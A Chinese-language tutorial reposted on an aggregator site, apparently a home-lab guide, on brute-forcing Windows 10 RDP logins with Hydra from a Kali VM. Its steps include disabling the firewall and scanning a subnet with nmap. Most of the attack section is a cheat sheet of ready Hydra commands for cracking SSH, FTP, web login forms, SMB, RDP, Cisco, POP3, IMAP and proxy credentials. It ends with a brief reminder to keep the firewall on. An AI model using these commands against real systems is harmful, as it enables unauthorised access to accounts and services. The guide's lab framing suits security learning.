admin管理员组文章数量:1589049
hydra暴力破解win10用户名和密码
准备工作:win10计算机开启3389端口和关闭防火墙
- 开启3389端口
3389端口:Windows 10远程桌面的服务端口,可以通过这个端口,用"远程桌面"等连接工具来连接到远程的服务器。
在桌面上右击“我的电脑”,选择“属性”,点击左边“远程设置”,选择“允许连接到此计算机”。
- 此外,为了让扫描更加顺利,我们还需要关闭win10计算机的防火墙。当然我们也可以借助nmap来穿透防火墙进行扫描,这一点以后会演示给大家。
“win+R”并输入命令:“cmd”打开win10计算机的终端,并输入命令"firewall.cpl"来打开防火墙的设置。
在显示的页面中,在左侧选择“开启或关闭windows Defender 防火墙”,最后将“专用网络”与“公用网络”的防火墙,均关闭。
另外,我们还需要保证kali虚拟机与win10系统的网络是互通的。
例如:
kali的ip地址:192.168.1.130,win10的ip地址为192.168.1.138。
这样,在kali的终端输入:ping 192.168.1.138,在win10终端输入:ping 192.168.1.130,就可以看到kali与win10之间的网络是互通的。
windows计算机中查看ip地址的命令:ipconfig。
kali虚拟机中查看ip地址的命令:ifconfig。
并且,ping命令在windows计算机中发送3次,会自动停止。而kali虚拟机中,则会一直向被测试的win10计算机发送测试数据。我们要想终止,就事用命令:ctrl+C。
在实际操作中,我发现:kali虚拟机要想ping通 win10计算机,必须先将win10的防火墙关闭。
- 使用namp 批量扫描 ,哪些开启3389端口。
在kali虚拟机中的终端输入命令:nmap -p 3389 192.168.1.10-255 。
hydra(九头蛇)
hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。
官 网:http://www.thc/thc-hydra。
- 参数说明
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec
rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd firebird ncp afp等等。
OPT 可选项
- 攻击案例
1、破解ssh:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
2、破解ftp:
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3、get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
4、post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。)
5、破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6、破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
7、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8、破解smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb
9、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V
11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
12、破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
- 详细案例
RDP 是 Remote Display Protocal(远程显示协议)的缩写,是微软公司基于多用户 Windows 系统开发的远程连接协议。
- 详细案例
hydra暴力破解win10用户名和密码
B站演示连接:https://www.bilibili/video/BV1bh411y7i5
- 为了大家的计算机网络安全,一定要打开防火墙和win10自带的安全软件Defender。
版权声明:本文标题:hydra暴力破解win10用户名和密码 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/xitong/1728054042a1143771.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论